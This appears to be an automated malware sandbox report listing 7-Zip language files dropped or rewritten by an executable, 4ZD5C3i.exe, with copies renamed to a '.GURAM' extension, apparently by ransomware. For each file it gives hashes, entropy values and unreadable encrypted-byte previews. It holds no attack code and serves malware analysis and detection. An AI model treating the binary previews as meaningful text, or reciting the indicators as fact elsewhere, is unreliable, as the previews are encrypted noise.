                                                                                                                                                                                                                                                Preview:n...v.X.?0.=.F!>..1....O}....8".\.Mg..sa.w>0.C....w.i..b.L..F~>.`.........F5J..X....xP....V.6.[H..hQ.Y.|.b.@.b.\.|...R_.l3}P....R..3I....!.2VGh.t..w..U.)>| B.CE...........r.)">..N^;2.....|\..rO.FF.w?.u0U..>$C.O..i.=.3..H...C.yc.R~.3aUA.I-V..=.....u\.a........n.*4u.'..ti...3F|.L..F...)H..O..GN.0e..a.!...H8..U..(n.14....I8.......G.....1X...J4+..Y.nQ6....XV...].#oBrba].au...*....Sn[.!...B...].}Y.g.ut..n^.....@..:.R.d-....6......K/..ar..-.....E..a......K.f.l...r....D.e..Q_@@5.n9B...BJ._.H..vK(.c.Ln..y..\.R..1.K.6@i3.r`...T.O...Q..W6d2..R...(..lyS../?&......4B..dK..e..K+"..#M..G5.V..T...I.CG.@..y~KtE...(.+....w.Vm..Y!...P..`.......!... S I..j...._K...!.(+b.......OX...Y..1o.I.0...2..xSL.bx.6.^......I..x....zs0.....IH}_cy.a.....y..BJ......g|.._....O.K.........x:[2HJ..?.2|..j.06#..\.....R0.-;...>.u..m..Q.o.....[...B.h....X....Vic..S..G...B......k.i.).h.eK.....$XP.A..M....( (.tQ..a.mI...4.j.....ck.....Y.o>2.X.....Z...._.. ..M5...^...H.s......2...TT.HY

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\en.ttt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8518
                                                                                                                                                                                                                                                Entropy (8bit):7.980995017205418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:y2FxQZ+L4MpzevrNcjTmnnn5lmB2bPbUDVNoD648WUB:NLdzepq52bQZeLAB
                                                                                                                                                                                                                                                MD5:548FDF0183F061EF4617020EFC3FF800
                                                                                                                                                                                                                                                SHA1:6592B3D4D2F65629B48FD01EF809789AA61BEDD3
                                                                                                                                                                                                                                                SHA-256:32430AD1195149B8D7806B7C642A18BA2FBB4F307AC68A477F8A2FAC096CC92E
                                                                                                                                                                                                                                                SHA-512:CDD7601DBC2560508579FC34FFA1AF14A6C6301633A1EC34B2166B8217661990A7C54522E2221C17985E7BDA067E231BA69680969CCCA03B92AE808553CC2577
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:B.#..-L..rd..M..>...t.XU.%..?g..+....{3=..K..U...._;E.~uR.fb..{ ../....cl.r..[....P.!t...Vp...#.ib,.-j.......l.pk.$..^..c.K.O..Q...(..ig.fwk]Aj|...........u.....j...........~.c..G2.a....2iV.D..9.~f~I.z....Ot..t.hv..7C..nu.7...zU.P...z......?..4..q..K.. ...dT.#...`.}......)...S.7,%.....z.^.em.K.v........*.+.;.h.P8.._.^3..a....,Z....!..Dm..{v.nOg.m..#....LD6..yW.P[.0.m. 0[.I............g.=..@.C.&.h..N..-.z?.....I...NK'0..I..]].J_!O....$4.`.3.h..G..k.;..].....o'.....B...q..=.....6i..Y....p.@.......fI^.:.H...WT..U.9.......i..t...Z?..0....&z.7,Z.d.....CsT.B.7.]/C.4..gL$..EKH.].[y.......2.w.0.(..2..v.#..X)....5..1.9<..7n..AY...<d....G..T.X..*..1..a-@c....Z.m.t....G.P..........*!.L...O.H.>.a..%wA.j........\...W..[%...>.%.}...[...........xP.....VI)Q!u.+...K..@EO.}...Sc. ...F.y....]V...BH;U.C...s.>[^.!*./..(....X.ga..6s3....+...G.gb:8...^uQ...=Y.D74C...d.f.>H.~.@1.R.E.9.~&...v-..\T.|...>..A..S..+.>....)$........u.....C...JNy.8.'.Mo..P.g=GN..&....{6._..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\en.ttt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8518
                                                                                                                                                                                                                                                Entropy (8bit):7.980995017205418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:y2FxQZ+L4MpzevrNcjTmnnn5lmB2bPbUDVNoD648WUB:NLdzepq52bQZeLAB
                                                                                                                                                                                                                                                MD5:548FDF0183F061EF4617020EFC3FF800
                                                                                                                                                                                                                                                SHA1:6592B3D4D2F65629B48FD01EF809789AA61BEDD3
                                                                                                                                                                                                                                                SHA-256:32430AD1195149B8D7806B7C642A18BA2FBB4F307AC68A477F8A2FAC096CC92E
                                                                                                                                                                                                                                                SHA-512:CDD7601DBC2560508579FC34FFA1AF14A6C6301633A1EC34B2166B8217661990A7C54522E2221C17985E7BDA067E231BA69680969CCCA03B92AE808553CC2577
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:B.#..-L..rd..M..>...t.XU.%..?g..+....{3=..K..U...._;E.~uR.fb..{ ../....cl.r..[....P.!t...Vp...#.ib,.-j.......l.pk.$..^..c.K.O..Q...(..ig.fwk]Aj|...........u.....j...........~.c..G2.a....2iV.D..9.~f~I.z....Ot..t.hv..7C..nu.7...zU.P...z......?..4..q..K.. ...dT.#...`.}......)...S.7,%.....z.^.em.K.v........*.+.;.h.P8.._.^3..a....,Z....!..Dm..{v.nOg.m..#....LD6..yW.P[.0.m. 0[.I............g.=..@.C.&.h..N..-.z?.....I...NK'0..I..]].J_!O....$4.`.3.h..G..k.;..].....o'.....B...q..=.....6i..Y....p.@.......fI^.:.H...WT..U.9.......i..t...Z?..0....&z.7,Z.d.....CsT.B.7.]/C.4..gL$..EKH.].[y.......2.w.0.(..2..v.#..X)....5..1.9<..7n..AY...<d....G..T.X..*..1..a-@c....Z.m.t....G.P..........*!.L...O.H.>.a..%wA.j........\...W..[%...>.%.}...[...........xP.....VI)Q!u.+...K..@EO.}...Sc. ...F.y....]V...BH;U.C...s.>[^.!*./..(....X.ga..6s3....+...G.gb:8...^uQ...=Y.D74C...d.f.>H.~.@1.R.E.9.~&...v-..\T.|...>..A..S..+.>....)$........u.....C...JNy.8.'.Mo..P.g=GN..&....{6._..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\eo.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5860
                                                                                                                                                                                                                                                Entropy (8bit):7.970169467576303
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:d5L3Xvfy3Uu3xVbB9rZxVrxEC1DJJ3Re5kAFhgAa1UXleF:jzf0NJ91xbhAFhWUXUF
                                                                                                                                                                                                                                                MD5:E1AA7877600FD6F58990DF4452D4B96A
                                                                                                                                                                                                                                                SHA1:B4E69805AEF95593868435B328054F34B0337368
                                                                                                                                                                                                                                                SHA-256:7733EB9C5B9D9900A980ED8E980329A95E47B4802976AB0D7797858E31E79881
                                                                                                                                                                                                                                                SHA-512:95805F05916A2E79768D091996792357531EA6535CC8D3A0C30E2A3E5450132CACDA994D0FE46083EF84B473EAFC87BFBC2DE19BEEF5D92B572656D8E37381C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.{..QC....e.'..x..:Y:5....A,"..4.QS/.YLw...{a.....U._..>[.n?.l.. .W.\..7.{-.......)6g.$^..A..E..W.G...7...5e.h8..'.KM.';......&..9.^xy...b..T2@.4.?.b..XO.+J.J....$....LU..'HkJ...X+.<.@..e<...:W...s........N..j..Y.h@...0>....x..;.fV....}......NV.C.yM..5..,.q.Q..u..N..l...7..^.)......j....s....v.AZ.bDh.rw..k.5..64i2m.zU...B......<...0...a..R.o./....h.K.....W.{.A`..C...i...=.5.B#h.;.f.Z..8....p..-........h........d..[..P.>.Ei..'..7.j...x>..v,..*.9...'......mS...U`f......zf.^i.C...z..Cz..og].0F.!.... ....dFGO"T.....[....GY..._@.Y...'.|`.........>..)...!.......,......~....4.....L]...y....X....C....g...Fd..c...n.gK..S=.>...iD(...W.(1..K9|....oo.r.K.......!..^.....D..H$d.S.M/..).V..Y.E%.....uf.F~.k.Y@.7q.N..8.[....H...:.....+.z.lZ3[....._.*.MQ.x5......z.........X95....q.Iu...T..%.......`f).m.D).j........1....AD..Sm.~N.x....*ADB.*S&..NY......j?.T..aI.......*......h.|cT.c.\...;..vw`.a..}1}.40t..;cbD.c.`7L..J"....E.....)=.87....8.4T....v..$..{....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\eo.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5860
                                                                                                                                                                                                                                                Entropy (8bit):7.970169467576303
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:d5L3Xvfy3Uu3xVbB9rZxVrxEC1DJJ3Re5kAFhgAa1UXleF:jzf0NJ91xbhAFhWUXUF
                                                                                                                                                                                                                                                MD5:E1AA7877600FD6F58990DF4452D4B96A
                                                                                                                                                                                                                                                SHA1:B4E69805AEF95593868435B328054F34B0337368
                                                                                                                                                                                                                                                SHA-256:7733EB9C5B9D9900A980ED8E980329A95E47B4802976AB0D7797858E31E79881
                                                                                                                                                                                                                                                SHA-512:95805F05916A2E79768D091996792357531EA6535CC8D3A0C30E2A3E5450132CACDA994D0FE46083EF84B473EAFC87BFBC2DE19BEEF5D92B572656D8E37381C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.{..QC....e.'..x..:Y:5....A,"..4.QS/.YLw...{a.....U._..>[.n?.l.. .W.\..7.{-.......)6g.$^..A..E..W.G...7...5e.h8..'.KM.';......&..9.^xy...b..T2@.4.?.b..XO.+J.J....$....LU..'HkJ...X+.<.@..e<...:W...s........N..j..Y.h@...0>....x..;.fV....}......NV.C.yM..5..,.q.Q..u..N..l...7..^.)......j....s....v.AZ.bDh.rw..k.5..64i2m.zU...B......<...0...a..R.o./....h.K.....W.{.A`..C...i...=.5.B#h.;.f.Z..8....p..-........h........d..[..P.>.Ei..'..7.j...x>..v,..*.9...'......mS...U`f......zf.^i.C...z..Cz..og].0F.!.... ....dFGO"T.....[....GY..._@.Y...'.|`.........>..)...!.......,......~....4.....L]...y....X....C....g...Fd..c...n.gK..S=.>...iD(...W.(1..K9|....oo.r.K.......!..^.....D..H$d.S.M/..).V..Y.E%.....uf.F~.k.Y@.7q.N..8.[....H...:.....+.z.lZ3[....._.*.MQ.x5......z.........X95....q.Iu...T..%.......`f).m.D).j........1....AD..Sm.~N.x....*ADB.*S&..NY......j?.T..aI.......*......h.|cT.c.\...;..vw`.a..}1}.40t..;cbD.c.`7L..J"....E.....)=.87....8.4T....v..$..{....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\es.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10647
                                                                                                                                                                                                                                                Entropy (8bit):7.981973479574102
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:MDuVt17x5gdw0LIeGLfUkoacXJGzPZIAa6LJKPJRqwDl9ZHbT5Qx7ZpukDWzElU6:5MdfIeGLfR/UcPWAP9KPJRqUBHn5gpum
                                                                                                                                                                                                                                                MD5:D202C873CD276DC37429BFD54B7BE425
                                                                                                                                                                                                                                                SHA1:5DADC9BBA449D903D93C4DF6CFFABF9CAA6F69F1
                                                                                                                                                                                                                                                SHA-256:ABC1CCC9B3C64D8D810BB75AA9E82BA359BBA63D4F6FEEC9B4E9A691EC1F6DD3
                                                                                                                                                                                                                                                SHA-512:7168DF91FF9EC218957818435A8B07B71A30C5A38208E6A239E55B0EBABE4FF429AABD39D4E6C208B1D0AF12AB922C8E1B61017F2CAF26D919BD8D059791B2AD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..T.N3..5uDZ#..'.-].`....{e.Y.....;......jQ!..3.W.....^..0.X;..0..VH.3. . !..4.'I..Q...\.YB.j......[*a{\..[f..j.......b..D..v...n...:H$..r?.,....q..Z. .@....*.....Q..KkHa..U...W.+G.-.GLFN.O<.4V|...w..{...c0............W......E...........f...5..+P[.....`M.....n.t7P.....B.........<......:...0.R.L.#.-..@..m.c$..|.#....6.._M..5t...r.-..;....+..R.Q..S.#.....@w.......E.b.....9..#.....H...$Y.YY.@.n.8....M...]p..Ul.....!{.t..pw.Fj7.&....W.-.kQ0..Z.%...Y.Ke.}.t..6..U...piH..{).*2JM..@.mq.]..+!X.2.).%....{T~..o.g.......%....s1u6f.fE.Y....'.."..Y.D.}Yx.M.0...........m.2t.....?u4.........Z#<..(...$t.>2..Z....}....... .r<!....p.g...e..$..N.6o....,..=.+.'.[0.%@...BNWr 9u...y.......=.o.U....n..J...(4O.B..l..j..e.......+..@.#G.X....;.]..5..u...Y.....m.Y>.....".!...L.h.}fH Y..U.aK...=Z...hP.;s.6........V...+.....N=$...l..74......?Y>.-.........w.D..\.(..1.[.w..u..~j.r.'q8....6.1...97.a.W.....-:c..9.1q........Fq.3..ohVmW4.MT..XqS....G..Rc.Y..6.L..n..zH..h.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\es.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10647
                                                                                                                                                                                                                                                Entropy (8bit):7.981973479574102
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:MDuVt17x5gdw0LIeGLfUkoacXJGzPZIAa6LJKPJRqwDl9ZHbT5Qx7ZpukDWzElU6:5MdfIeGLfR/UcPWAP9KPJRqUBHn5gpum
                                                                                                                                                                                                                                                MD5:D202C873CD276DC37429BFD54B7BE425
                                                                                                                                                                                                                                                SHA1:5DADC9BBA449D903D93C4DF6CFFABF9CAA6F69F1
                                                                                                                                                                                                                                                SHA-256:ABC1CCC9B3C64D8D810BB75AA9E82BA359BBA63D4F6FEEC9B4E9A691EC1F6DD3
                                                                                                                                                                                                                                                SHA-512:7168DF91FF9EC218957818435A8B07B71A30C5A38208E6A239E55B0EBABE4FF429AABD39D4E6C208B1D0AF12AB922C8E1B61017F2CAF26D919BD8D059791B2AD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..T.N3..5uDZ#..'.-].`....{e.Y.....;......jQ!..3.W.....^..0.X;..0..VH.3. . !..4.'I..Q...\.YB.j......[*a{\..[f..j.......b..D..v...n...:H$..r?.,....q..Z. .@....*.....Q..KkHa..U...W.+G.-.GLFN.O<.4V|...w..{...c0............W......E...........f...5..+P[.....`M.....n.t7P.....B.........<......:...0.R.L.#.-..@..m.c$..|.#....6.._M..5t...r.-..;....+..R.Q..S.#.....@w.......E.b.....9..#.....H...$Y.YY.@.n.8....M...]p..Ul.....!{.t..pw.Fj7.&....W.-.kQ0..Z.%...Y.Ke.}.t..6..U...piH..{).*2JM..@.mq.]..+!X.2.).%....{T~..o.g.......%....s1u6f.fE.Y....'.."..Y.D.}Yx.M.0...........m.2t.....?u4.........Z#<..(...$t.>2..Z....}....... .r<!....p.g...e..$..N.6o....,..=.+.'.[0.%@...BNWr 9u...y.......=.o.U....n..J...(4O.B..l..j..e.......+..@.#G.X....;.]..5..u...Y.....m.Y>.....".!...L.h.}fH Y..U.aK...=Z...hP.;s.6........V...+.....N=$...l..74......?Y>.-.........w.D..\.(..1.[.w..u..~j.r.'q8....6.1...97.a.W.....-:c..9.1q........Fq.3..ohVmW4.MT..XqS....G..Rc.Y..6.L..n..zH..h.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\et.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7679
                                                                                                                                                                                                                                                Entropy (8bit):7.977595652745256
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:aN2b+T3Vvfi6Lh/u3D9nCKGyhqtIXb0Z4CMvFKUcb:as+TFyf3qIXbDne
                                                                                                                                                                                                                                                MD5:C1E67EA61A94200BE76DB797C5FCCBE1
                                                                                                                                                                                                                                                SHA1:5EA00E670706F58C19D0C651B8EFF2789AB646F0
                                                                                                                                                                                                                                                SHA-256:7F626669A7C0F5043BA464DABF5A430841E070F4B655DFDEE3F628E0FF717695
                                                                                                                                                                                                                                                SHA-512:C1C00ED155F69E024AFC5E146245AD51ADC54ED7DAF611C8BA004C80B1BBAC1F8F3B82AB406F0A4523E236464E92EE463D370B08CA834A3B194CAEA60E34C8F9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....&9H..:..0#..._(.9.W........|d./..M.s.....=J@..;.1...A..w W..Z.?.....6..p...@........?.w.....#?...FW......I.~,+Gn.J.3..vtM..L=.8B.......p.w...;.BOi......vM.!.s..'hG....u...N.2.Pp.y4...Dj.....*...$.....W..d.z}...Mq..tN..~..J:r......2....KP...)....{.DW........C..~LnY.0?.^R..u..r.7....f.#Xk..1h..TU..l3.4........../..V...3...L.j#w..h........8..t...../.n..{.G.-.K..}.....U...T.|......%.8Zov...C..?...r.o...L.n>...j.4/.M..h@{.:....Vc?.z....-.x.s......y.:Z..7.@.Ca....]....kI.....g&L.fT{n.[.$..!...C.9...X.`.....)!.R....=....k".K....S')....Q.A[.>[.k..1]e.....Q.H:.H(PW....i(q.EB$.....[x.W.;..O}C..-,.]...Rn.Q1......c./Q....-.hf.t....g...+.J*.g&.F~:...ZA.k.s.$.A.a...'*.@.%..7.#).u.X..xr[.21...b...&.......8Jbw.O......F.....z......qD.m... ......a.z..9.0d....R...kW..; h[.W.2I.eU7.v..........i....W.b...uy.......>.,.d........j....CEc.d...K..i...;.9]...o..-.U..AR.BG.0M19.4eJ3...<ND5.a...3.IL..-P(...x....`...i....@.....#..z.!U..6&rR..6...M.......B

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\et.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7679
                                                                                                                                                                                                                                                Entropy (8bit):7.977595652745256
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:aN2b+T3Vvfi6Lh/u3D9nCKGyhqtIXb0Z4CMvFKUcb:as+TFyf3qIXbDne
                                                                                                                                                                                                                                                MD5:C1E67EA61A94200BE76DB797C5FCCBE1
                                                                                                                                                                                                                                                SHA1:5EA00E670706F58C19D0C651B8EFF2789AB646F0
                                                                                                                                                                                                                                                SHA-256:7F626669A7C0F5043BA464DABF5A430841E070F4B655DFDEE3F628E0FF717695
                                                                                                                                                                                                                                                SHA-512:C1C00ED155F69E024AFC5E146245AD51ADC54ED7DAF611C8BA004C80B1BBAC1F8F3B82AB406F0A4523E236464E92EE463D370B08CA834A3B194CAEA60E34C8F9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....&9H..:..0#..._(.9.W........|d./..M.s.....=J@..;.1...A..w W..Z.?.....6..p...@........?.w.....#?...FW......I.~,+Gn.J.3..vtM..L=.8B.......p.w...;.BOi......vM.!.s..'hG....u...N.2.Pp.y4...Dj.....*...$.....W..d.z}...Mq..tN..~..J:r......2....KP...)....{.DW........C..~LnY.0?.^R..u..r.7....f.#Xk..1h..TU..l3.4........../..V...3...L.j#w..h........8..t...../.n..{.G.-.K..}.....U...T.|......%.8Zov...C..?...r.o...L.n>...j.4/.M..h@{.:....Vc?.z....-.x.s......y.:Z..7.@.Ca....]....kI.....g&L.fT{n.[.$..!...C.9...X.`.....)!.R....=....k".K....S')....Q.A[.>[.k..1]e.....Q.H:.H(PW....i(q.EB$.....[x.W.;..O}C..-,.]...Rn.Q1......c./Q....-.hf.t....g...+.J*.g&.F~:...ZA.k.s.$.A.a...'*.@.%..7.#).u.X..xr[.21...b...&.......8Jbw.O......F.....z......qD.m... ......a.z..9.0d....R...kW..; h[.W.2I.eU7.v..........i....W.b...uy.......>.,.d........j....CEc.d...K..i...;.9]...o..-.U..AR.BG.0M19.4eJ3...<ND5.a...3.IL..-P(...x....`...i....@.....#..z.!U..6&rR..6...M.......B

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\eu.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9502
                                                                                                                                                                                                                                                Entropy (8bit):7.982348396100264
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qXfi+x60fvJGtLSYdaV5pTbF+/JvW25MPdhlDIbhkmntr0kLG+8nfwUi9:q6ntCVfN25Af9IntAWGZfi9
                                                                                                                                                                                                                                                MD5:786213A51560B8FEB3FE9E7787634EE3
                                                                                                                                                                                                                                                SHA1:E09F9E4A8F4E90CD6FCBF3CD79AD6D4E00DE25A6
                                                                                                                                                                                                                                                SHA-256:CE568C7CF80988909BEE309AA84EBECEA00934B78E9327D93877B380E6AA3049
                                                                                                                                                                                                                                                SHA-512:BF3DB5FD1FE6CBEC1DFF45360D71CCFEDCC1E45809D3F3283694D09E3AEA250D34D0D73D2D3E9D7C9A47C6A07F8F5F9E83F0565474A6F93A32E3E5643F9709E2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....}/!-......)..]......._.S......i.OH......RMW.y...`+....[iL..j.....2...sv..KB....1yoHqU|.~.rv.........T..dyo..2......Ew.i6..r.,i...90...(Iw.(.p.....M8.....0..g....z..w.I..xza.#...[uIf......-c3.ks..ly'..<.....u..T..<K..@sX...:......%...z+.#.G.g.4..2..?...3.p>A.v..P..B....W...o..=..c.O$^.........2.h..{.ST.s..Z.. .7...t........CB.@X.U...OH......h-.qv....,.x0......VT[....j...g(G%.l.9.IK.09..^......].v...".D..p\..O...L.3@@..w+.\....].t....G.\?....=........Z.,]...T)..... ...@{...3re.g. ..<.EP Rl.....~Z.x...3...`}.y.z......!......@.yA-L...q`....|!.D...L+./*.mi.N..N.....-...X.........LH.Y..u$...U ..p.}..Vv...Zr...4.ER.......-S.D.}j/.OpX.....*..p..*.r.. .B..f.l).. 9..|...'..P...h........_hm .9.....(....)}.....,..K~...*.l.W..j...O*?.....h.f.h...<%..7.v4o.{...,.:.-}......A.......9)..U...qIdy..........B'o......ye#......}.1..*.... ..Y:...E.........=w....#7=.7uU`...o.'....NEz@}..[.ybQ..1.D7...a......U..E....j'`...*..Q.. ..|f.....,.<..o..<..G.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\eu.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9502
                                                                                                                                                                                                                                                Entropy (8bit):7.982348396100264
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qXfi+x60fvJGtLSYdaV5pTbF+/JvW25MPdhlDIbhkmntr0kLG+8nfwUi9:q6ntCVfN25Af9IntAWGZfi9
                                                                                                                                                                                                                                                MD5:786213A51560B8FEB3FE9E7787634EE3
                                                                                                                                                                                                                                                SHA1:E09F9E4A8F4E90CD6FCBF3CD79AD6D4E00DE25A6
                                                                                                                                                                                                                                                SHA-256:CE568C7CF80988909BEE309AA84EBECEA00934B78E9327D93877B380E6AA3049
                                                                                                                                                                                                                                                SHA-512:BF3DB5FD1FE6CBEC1DFF45360D71CCFEDCC1E45809D3F3283694D09E3AEA250D34D0D73D2D3E9D7C9A47C6A07F8F5F9E83F0565474A6F93A32E3E5643F9709E2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....}/!-......)..]......._.S......i.OH......RMW.y...`+....[iL..j.....2...sv..KB....1yoHqU|.~.rv.........T..dyo..2......Ew.i6..r.,i...90...(Iw.(.p.....M8.....0..g....z..w.I..xza.#...[uIf......-c3.ks..ly'..<.....u..T..<K..@sX...:......%...z+.#.G.g.4..2..?...3.p>A.v..P..B....W...o..=..c.O$^.........2.h..{.ST.s..Z.. .7...t........CB.@X.U...OH......h-.qv....,.x0......VT[....j...g(G%.l.9.IK.09..^......].v...".D..p\..O...L.3@@..w+.\....].t....G.\?....=........Z.,]...T)..... ...@{...3re.g. ..<.EP Rl.....~Z.x...3...`}.y.z......!......@.yA-L...q`....|!.D...L+./*.mi.N..N.....-...X.........LH.Y..u$...U ..p.}..Vv...Zr...4.ER.......-S.D.}j/.OpX.....*..p..*.r.. .B..f.l).. 9..|...'..P...h........_hm .9.....(....)}.....,..K~...*.l.W..j...O*?.....h.f.h...<%..7.v4o.{...,.:.-}......A.......9)..U...qIdy..........B'o......ye#......}.1..*.... ..Y:...E.........=w....#7=.7uU`...o.'....NEz@}..[.ybQ..1.D7...a......U..E....j'`...*..Q.. ..|f.....,.<..o..<..G.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ext.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8329
                                                                                                                                                                                                                                                Entropy (8bit):7.978491106310768
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:wJYgKgQzLimTGiVEFpjawnIUXFELEaZoGg+iuvgH9imkvUt:JgdPXfFAwn7SpZoGg+iuTmkst
                                                                                                                                                                                                                                                MD5:DE846F64BB9AE6E5D5C063C4092468B5
                                                                                                                                                                                                                                                SHA1:898F2316924C3E251E9495D782114AAE8A7C43B6
                                                                                                                                                                                                                                                SHA-256:D37D229D16F5677D1E7335A293B66D050AB9E366634B74BD86ABB915AA636953
                                                                                                                                                                                                                                                SHA-512:2A66FAE6EDE6C3EC81B9FB2E61C34421C0A7CCA66E1C1A4E3321BEDB334387F44FA8A58BA5A0FFA4FF1035D4CFCF3C510F183729311F313F2A8F31CD531D1612
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
